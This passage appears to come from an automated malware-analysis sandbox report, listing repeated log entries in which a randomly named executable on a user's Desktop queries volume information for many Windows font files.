                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
